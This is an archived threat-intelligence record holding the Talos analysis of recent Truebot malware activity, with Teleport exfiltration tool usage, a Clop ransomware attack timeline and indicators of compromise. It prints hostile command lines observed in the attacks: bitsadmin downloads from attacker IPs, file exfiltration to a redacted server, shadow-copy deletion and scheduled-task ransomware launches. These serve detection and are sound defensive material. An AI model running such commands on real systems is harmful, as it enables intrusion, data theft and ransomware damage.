{
	"id": "2b1633d7-0539-4351-ad72-ede13f5c8907",
	"created_at": "2026-04-06T00:10:50.052028Z",
	"updated_at": "2026-04-10T03:36:37.113449Z",
	"deleted_at": null,
	"sha1_hash": "1460844da0d4a71e4f8aff5a4f7c3a5d70efb5d7",
	"title": "Breaking the silence - Recent Truebot activity",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3319498,
	"plain_text": "Breaking the silence - Recent Truebot activity\r\nBy Tiago Pereira\r\nPublished: 2022-12-08 · Archived: 2026-04-05 19:57:14 UTC\r\nThursday, December 8, 2022 14:38\r\nSince August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware. Truebot\r\nwas first identified in 2017 and researchers have linked it to a threat actor called Silence Group that is responsible\r\nfor several high-impact attacks on financial institutions in several countries around the world.\r\nThere are claims by other researchers that this group is associated with the well-known threat actor TA505 (aka\r\nEvil Corp). In our research, we found that one of the new follow-on payloads that Truebot drops is Grace (aka\r\nFlawedGrace and GraceWire) malware, which is attributed to TA505, further supporting these claims.\r\nRecently, the attackers have shifted from using malicious emails as their primary delivery method to other\r\ntechniques. In August, we saw a small number of attacks that exploited a recent remote code execution\r\nvulnerability in Netwrix auditor. In October, a larger number of infections leveraged Raspberry Robin, a recent\r\nmalware spread through USB drives, as a delivery vector. We believe with moderate confidence that during\r\nNovember, the attackers started using yet another way to distribute the malware.\r\nPost-compromise activity included data theft and the execution of Clop ransomware. While investigating one of\r\nthese attacks, we found what seems to be a fully featured custom data exfiltration tool, which we are calling\r\n\"Teleport,\" that was extensively used to steal information during the attack.\r\nSo far, we have identified two different Truebot botnets. One is distributed worldwide, but with particular focus on\r\nMexico, Pakistan, and Brazil. The second, more recent botnet appears to be focused on the U.S. 
While we don't\r\nhave enough information to say that there is a specific focus on a sector, we noticed a number of compromised\r\neducation sector organizations.\r\nNew attack vectors\r\nIn August, we noticed a small number of cases where Truebot was executed after the exploitation of a\r\nvulnerability in Netwrix Auditor, an IT asset management tool.\r\nWe have high confidence that this was used as the entry vector on some of the compromised organizations.\r\nHowever, due to the reduced exposure of this product directly on the internet, it is unlikely that the attackers\r\nmanaged to compromise a high number of systems this way.\r\nLater, in the beginning of October, we started seeing a bigger uptick in Truebot infections, as it started being\r\ndelivered by Raspberry Robin malware. This was also noticed by others, such as Microsoft, which wrote a blog\r\npost focused on the connections of Raspberry Robin to a larger ecosystem that included Truebot as one of the\r\npayloads.\r\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\r\nPage 1 of 14\n\nWe believe with high confidence that these two vectors, mainly the Raspberry Robin delivery, led to the creation\r\nof a botnet of over 1,000 systems that is distributed worldwide, but with particular focus on Mexico, Brazil, and\r\nPakistan, as seen in the following image.\r\nIn November, we started seeing a new botnet being created. The following image shows the evolution of the\r\ninfections on this botnet, based on openDNS telemetry:\r\nWhile the victims of the first botnet were mostly desktop systems not directly accessible from the internet, this\r\nsecond botnet is almost exclusively composed of Windows servers, directly connected to the internet, and\r\nexposing several Windows services such as SMB, RDP, and WinRM, but interestingly not Netwrix. 
This suggests\r\nthat the attackers are using another distribution mechanism, although we have not yet identified this attack vector.\r\nThis new botnet, with over 500 infections at the time of writing, seems to be focused on the U.S. (around 75% of\r\ninfections). The following image shows the geographic infection distribution.\r\nNetwrix vulnerability (CVE-2022-31199) based delivery\r\nBetween mid-August and September, we observed a small number of events in which suspicious commands were\r\nexecuted by a process named UAVRServer.exe. This process triggered the execution of bitsadmin to download\r\nand execute a binary. Further research revealed that this was an updated version of Truebot.\r\nThe following is an example of one of these commands executed by the UAVRServer.exe process:\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dl\r\nWe were not able to collect the exploit code. However, because multiple of these events occurred in the same\r\ntimeframe on unrelated organizations, we believe with high confidence that these events are the result of the\r\nexploitation of a vulnerability in Netwrix Auditor (CVE-2022-31199) that was made public in July 2022 by\r\nBishop Fox.\r\nNetwrix Auditor is an auditing tool that is used to assess the compliance with security and other best practices of\r\nIT assets and, according to the vulnerability disclosure document: “Netwrix Auditor is vulnerable to an insecure\r\nobject deserialization issue that is caused by an unsecured .NET remoting service. 
An attacker can submit\r\narbitrary objects to the application through this service to achieve remote code execution on Netwrix Auditor\r\nservers.”\r\nHowever, the vulnerable .NET remoting service would not usually be exposed to the internet, which may explain\r\nwhy we have seen only a small number of these attacks. We were able to confirm that at least one of the exploited\r\nsystems was directly exposed to the internet with minimal or no firewall protection, and believe with high\r\nconfidence that this exploit was the entry vector to an attack that included further post-compromise activity.\r\nAccording to the vulnerability disclosure document: “Since this service is typically executed with extensive\r\nprivileges in an Active Directory environment, the attacker would likely be able to compromise the Active\r\nDirectory domain.”\r\nThis means that exploiting the vulnerability is effectively a fast track to compromising an organization domain-wide. It also means that this vulnerability is likely to be exploited within organizations that are already\r\ncompromised to get administrative rights without raising any red flags.\r\nThis vulnerability had been published only a few weeks before the attacks took place, and the number of systems\r\nexposed to the internet is expected to be quite small. This suggests that the attackers are not only on the lookout\r\nfor new infection vectors, but are also able to quickly test them and incorporate them into their workflow.\r\nRaspberry Robin delivery\r\nMore recently, since the beginning of October, we started seeing a higher number of systems infected with\r\nTruebot. 
This timeframe corresponded with new research that found many of these systems had previous\r\nRaspberry Robin infections that were delivering Truebot.\r\nThis has been documented by Microsoft in a blog detailing how Raspberry Robin is part of a larger criminal\r\necosystem and has recently started delivering a few other malware families, including FakeUpdates, IcedID,\r\nBumblebee, and Truebot.\r\nIn our telemetry, we have observed multiple occurrences of Raspberry Robin delivering Truebot. The following\r\nimage illustrates the attack sequence.\r\nThe system was infected with Raspberry Robin through a USB device and, just a few minutes later, the malicious\r\nprocess downloaded the Truebot .dll file and executed it using rundll32.exe.\r\nIn other cases, the Raspberry Robin infection that delivered Truebot had been present for some time.\r\nNew Truebot version\r\nTruebot is a downloader malware. As such, its main goal is to infect systems, collect information to help triage\r\ninteresting targets, and deploy additional payloads. Once a system is infected, the malware collects information\r\nand sends it to the attacker’s command and control (C2). This version collects additional information: a\r\nscreenshot, the computer name, the local network name, and active directory trust relations.\r\nThis collected information hints at what the attackers are looking for. Active directory trust relations allow\r\norganizations to share users and resources across domains. 
Some use cases include extranets, connecting service\r\nproviders or even mergers and acquisitions.\r\nThis suggests the attackers are targeting large organizations, where these relations are more commonly deployed.\r\nBesides being a great indicator of a large organization, one example where this information could prove useful\r\nwould be in finding a poorly protected network (for example, a company acquisition) that would provide an entry\r\nroute to a more secure network.\r\nAs a downloader, it also has some features that were not present in previously documented versions of the\r\nmalware. Besides downloading and executing files, the malware is now able to load and execute additional\r\nmodules and shellcodes in memory, making the payloads less likely to be detected.\r\nAs illustrated in the image above, the “404NOTFOUND” command is used to emit no command. The “KLL |\r\nKLLSELF” commands cause the bot to uninstall, and, if the response contains an HTTP URL followed by a “|\r\n\u003caction\u003e” keyword, it performs one of the following actions:\r\n|EXE – Download and run .exe file\r\n|DLL – Download and run .dll file\r\n|PS1 – Download and run .ps1 file\r\n|BAT – Download and run .bat file\r\n|DNM – Download and run .dll in memory\r\n|SCH – Download and run shellcode\r\n|S64 – Download and run 64 bit shellcode\r\nThe communication protocol changed slightly to include the new features. In summary, the HTTP communication\r\nincludes new fields for the network name and trust relations data, and it is sent as a POST request with a\r\nparameter “q=\u003cbase64 encoded data\u003e”. The remaining protocol details and encryption mechanism seem to remain\r\nunchanged, as has been previously documented.\r\nPost-compromise activity\r\nPost compromise, we found two payloads delivered by Truebot, Cobalt Strike and Grace malware, 
and what\r\nseems to be a custom data exfiltration tool that was used extensively by the attackers to steal information from the\r\nnetwork.\r\nGrace and Cobalt Strike\r\nOnce the systems have been compromised with Truebot, the attackers triage what seem to be interesting systems\r\nfor further analysis and deploy additional malware to assist in that analysis.\r\nIn this case, the payloads we found were 32- and 64-bit versions of Cobalt Strike reverse shell shellcode, Cobalt\r\nStrike delivered through PowerShell reflection, and a Grace shellcode loader containing a complex packer that\r\ncontained Grace malware. This is a fairly complex packer that Outpost24 called “GraceWrapper” and\r\nextensively documented in a recent blog post, based on samples from an attack documented by Proofpoint in\r\nlate 2021 where the new version of Grace was spotted.\r\nAfter unpacking, we were able to obtain a Grace binary, easily identifiable by a string in memory as well as the\r\nC++ class names left in the binary.\r\nFinding Grace as a payload is interesting, as it is known to be almost exclusively used by TA505, which further\r\nstrengthens previous claims of a connection between Silence Group and TA505 made by Group-IB, based on a\r\nsource code comparison with FlawedAmmyy, and by Deutsche Telekom, which identified different\r\nmalware packed with TA505’s custom packer.\r\nAfter dropping one of the described payloads, the post-compromise attack flow is similar to that of other human-operated attacks. 
However, while investigating, we came across a set of commands to exfiltrate stolen data that\r\nmade use of a tool that was unknown to us.\r\nAfter examining the binary, we found what seems to be a custom data exfiltration tool built in C++ and containing\r\nseveral features that make the process of data exfiltration easier and stealthier. We are calling it \"Teleport\" based\r\non the communication encryption key hardcoded in the binary.\r\nRegarding the tool’s features, the following usage information provided by the tool itself is a great summary:\r\nUsage: tool.exe /RH:str /RP:int [/RS:int] [/P:str] [/D:str] [/DS:str] [/M:str] [/MX:str] [/SL:int] [/SU:int] [/\r\n/RH:str -- Server host name to upload to\r\n/RP:int -- Server port number to upload to\r\n/RS:int -- Upload speed (in kilobytes per second)\r\n/P:str -- Directory prefix\r\n/D:str -- Directory to download from (recursive search)\r\n/DS:str -- Directory to download from (non-recursive search)\r\n/M:str -- File mask (default is *.*)\r\n/MX:str -- File mask to exclude\r\n/SL:int -- Lower size limit (in bytes)\r\n/SU:int -- Upper size limit (in bytes)\r\n/CS:str -- Creation date since (DDMMYYYY)\r\n/CU:str -- Creation date until (DDMMYYYY)\r\n/MS:str -- Modified date since (DDMMYYYY)\r\n/MU:str -- Modified date until (DDMMYYYY)\r\n/E -- Prescan mode (cache files before sending)\r\n/K -- Remove itself after execution\r\n/Q -- Quiet mode (don't show messages)\r\nEither /D or /DS must be specified.\r\nFlags /M, /MX, /D and /DS may be used more than once.\r\nLooking at the feature list we can see that, while not malicious per se, it has some features that are not common in\r\nremote copying tools that are useful to an attacker exfiltrating data during an attack:\r\nLimiting the upload speed, which can make the transmission go undetected by tools that monitor for large\r\ndata exfiltration. 
This can avoid making the network slow due to the file copying activity.\r\nThe communication is encrypted with a custom protocol to hide what information is being transmitted.\r\nLimiting the file size, which can maximize the number of stolen files by avoiding lengthy copies of files\r\nthat may not be interesting.\r\nThe ability to delete itself after use, which is ideal to keep it as unknown as possible.\r\nWhile testing Teleport, we saw that the data was not in clear text. Further analysis revealed that it uses a custom\r\ncommunication protocol that encrypts data using AES and a hardcoded key. Reverse engineering revealed the\r\nfollowing protocol structure that wraps the messages with an encryption layer.\r\nMost messages sent by the tool to its server start with a message-type identifier, followed by the size of the\r\nremaining payload, of which the first four bytes are a CRC32 check to ensure the integrity of the message, the\r\nnext 16 bytes are a random initialization vector, and the remaining bytes are the payload content encrypted using\r\nthe algorithm AES/CBC/NoPadding.\r\nThe use of a custom data exfiltration tool is curious. Why would an attacker develop such a tool when there are so\r\nmany different file copying solutions? There are a few possible reasons.\r\nFor example, it makes the process of stealing interesting information from an unknown network of unknown\r\nsystems faster. If we look at its use during the attack, we can see that the attackers are repeating on a large number\r\nof systems a few commands that the attackers know have good potential of gathering valuable information. 
For\r\nexample:\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:\u003c\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /M:*.ost /M:*.pst /P:\u003cremote path\u003e\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:\u003cr\r\nThese commands effectively collect interesting files from the user’s OneDrive and Downloads folders and collect\r\nthe user’s Outlook emails. Combining filtering by extension, file size, and file age allows the creation of\r\ncommands that are repeatable and effective.\r\nAnother reason includes stealth. It is not on the list of common file copying tools, which provides limited\r\nstealthiness, but it also allows the limitation of bandwidth usage and communication encryption.\r\nThe Clop attack\r\nAs previously mentioned, one of the possible outcomes of these attacks is double extortion using Clop\r\nransomware. We had the opportunity to investigate one of these attacks in further detail. The following table\r\nsummarizes the techniques used organized by the MITRE ATT\u0026CK framework.\r\nThe attack was in its essence similar to many other human-operated ransomware attacks. After compromise, the\r\nattackers dropped Cobalt Strike on several systems and started mapping the network and moving laterally to\r\nsystems of interest. During the exploration and lateral movement phases, the attackers browsed key server and\r\ndesktop file systems, connected to SQL databases, and collected data that was exfiltrated using the Teleport tool to\r\nan attacker-controlled server. 
Once sufficient data had been collected, the attackers created scheduled tasks on a\r\nlarge number of systems to simultaneously start executing the Clop ransomware and encrypt the highest possible\r\nvolume of data.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. 
Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nThe following Snort SIDs are applicable to this threat: 60844-60845, 60948-60949, 300329\r\nIOCs\r\nIOCs for this research can be found in our GitHub repository here.\r\nNetwrix exploitation command examples:\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c bitsadmin /transfer IVjATqWXcLnw hxxp://179[.]60[.]150[.]53:80/download/Googl\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c bitsadmin /transfer SysLog hxxp://179[.]60[.]150[.]34:80/download/file.ext c:\\\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll\r\nNew Truebot version\r\nSamples:\r\n092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875 1ef8cdbd3773bd82e5be25d4ba61e5e59371c633172684\r\nb95a764820e918f42b664f3c9a96141e2d7d7d228da0edf151617fabdd9166cf\r\n80b9c5ec798e7bbd71bbdfffab11653f36a7a30e51de3a72c5213eafe65965d9\r\nDownload URLs:\r\nhxxp://179[.]60[.]150[.]34:80/download/file.ext\r\nhxxp://179[.]60[.]150[.]53:80/download/msruntime.dll\r\nhxxp://179[.]60[.]150[.]53:80/download/GoogleUpdate.dll\r\nhxxp://tddshht[.]com/chkds.dll\r\nC2 
addresses:\r\nSample:\r\ndd94c2fc46a6670b4600cf439b35dc81a401b09d2c2372139afe7b754d1d24d4\r\nGrace\r\nSample (decrypted shellcode):\r\n27b6e71b4adeada41fb1e411a910872bfad999183d9d43ba6e63602e104d357b\r\nC2:\r\n45[.]227[.]253[.]102\r\nClop ransomware\r\nFollowing are some of the command lines observed during this attack that may help detect ongoing malicious\r\nactivity. There are, however, benign or dual-use tools and commands in this list, so they should not be used as the\r\nsole indicator of an ongoing attack.\r\nadfind.exe -f \u0026(objectcategory=computer) operatingsystem -csv\r\nadfind -f objectcategory=person samaccountname name displayname givenname department description title mail logo\r\nadfind.exe -h \u003credacted\u003e -f \u0026(objectcategory=computer) operatingsystem samaccountname name displayname givenname\r\nsqlcmd -q select name from sys.databases\r\nsqlcmd -s \u003chostname\u003e -q select name from sys.databases\r\nsqlcmd -s \u003chostname\u003e -q set nocount on; select table_name from information_schema.tables where table_type = 'bas\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:\u003cr\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /M:*.ost /M:*.pst /P:\u003cremote path\u003e\r\n\u003credacted\u003e.exe /RH:\u003cexfiltration server\u003e /RP:443 /x:\u003cpassword\u003e /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:\u003cr\r\nC:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where ID=\u003credacted\u003e 
delete\r\nC:\\windows\\WinCDropQSysvolY.exe\r\nC:\\windows\\WinCDropQSysvolY.exe runrun\r\nschtasks.exe /create /tn OneDrvTest /tr C:\\windows\\SysZDropQLogonQ.exe /s\r\n\u003credacted\u003e /sc onstart /ru system /f\r\nschtasks.exe /run /tn OneDrvTest /s \u003credacted\u003e\r\nSource: https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/"
	],
	"report_names": [
		"breaking-the-silence-recent-truebot-activity"
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "50068c14-343c-4491-b568-df41dd59551c",
			"created_at": "2022-10-25T15:50:23.253218Z",
			"updated_at": "2026-04-10T02:00:05.234464Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Indrik Spider",
				"Evil Corp",
				"Manatee Tempest",
				"DEV-0243",
				"UNC2165"
			],
			"source_name": "MITRE:Indrik Spider",
			"tools": [
				"Mimikatz",
				"PsExec",
				"Dridex",
				"WastedLocker",
				"BitPaymer",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b296f34c-c424-41da-98bf-90312a5df8ef",
			"created_at": "2024-06-19T02:03:08.027585Z",
			"updated_at": "2026-04-10T02:00:03.621193Z",
			"deleted_at": null,
			"main_name": "GOLD DRAKE",
			"aliases": [
				"Evil Corp",
				"Indrik Spider ",
				"Manatee Tempest "
			],
			"source_name": "Secureworks:GOLD DRAKE",
			"tools": [
				"BitPaymer",
				"Cobalt Strike",
				"Covenant",
				"Donut",
				"Dridex",
				"Hades",
				"Koadic",
				"LockBit",
				"Macaw Locker",
				"Mimikatz",
				"Payload.Bin",
				"Phoenix CryptoLocker",
				"PowerShell Empire",
				"PowerSploit",
				"SocGholish",
				"WastedLocker"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e8ebcbda-e8df-4a38-a2a6-63b2608ee6f3",
			"created_at": "2023-01-06T13:46:38.88051Z",
			"updated_at": "2026-04-10T02:00:03.131218Z",
			"deleted_at": null,
			"main_name": "Silence group",
			"aliases": [
				"WHISPER SPIDER"
			],
			"source_name": "MISPGALAXY:Silence group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9806f226-935f-48eb-b138-6616c9bb9d69",
			"created_at": "2022-10-25T16:07:23.73153Z",
			"updated_at": "2026-04-10T02:00:04.729977Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Blue Lelantos",
				"DEV-0243",
				"Evil Corp",
				"G0119",
				"Gold Drake",
				"Gold Winter",
				"Manatee Tempest",
				"Mustard Tempest",
				"UNC2165"
			],
			"source_name": "ETDA:Indrik Spider",
			"tools": [
				"Advanced Port Scanner",
				"Agentemis",
				"Babuk",
				"Babuk Locker",
				"Babyk",
				"BitPaymer",
				"Bugat",
				"Bugat v5",
				"Cobalt Strike",
				"CobaltStrike",
				"Cridex",
				"Dridex",
				"EmPyre",
				"EmpireProject",
				"FAKEUPDATES",
				"FakeUpdate",
				"Feodo",
				"FriedEx",
				"Hades",
				"IEncrypt",
				"LINK_MSIEXEC",
				"MEGAsync",
				"Macaw Locker",
				"Metasploit",
				"Mimikatz",
				"PayloadBIN",
				"Phoenix Locker",
				"PowerShell Empire",
				"PowerSploit",
				"PsExec",
				"QNAP-Worm",
				"Raspberry Robin",
				"RaspberryRobin",
				"SocGholish",
				"Vasa Locker",
				"WastedLoader",
				"WastedLocker",
				"cobeacon",
				"wp_encrypt"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6c4f98b3-fe14-42d6-beaa-866395455e52",
			"created_at": "2023-01-06T13:46:39.169554Z",
			"updated_at": "2026-04-10T02:00:03.23458Z",
			"deleted_at": null,
			"main_name": "Evil Corp",
			"aliases": [
				"GOLD DRAKE"
			],
			"source_name": "MISPGALAXY:Evil Corp",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434250,
	"ts_updated_at": 1775792197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1460844da0d4a71e4f8aff5a4f7c3a5d70efb5d7.pdf",
		"text": "https://archive.orkl.eu/1460844da0d4a71e4f8aff5a4f7c3a5d70efb5d7.txt",
		"img": "https://archive.orkl.eu/1460844da0d4a71e4f8aff5a4f7c3a5d70efb5d7.jpg"
	}
}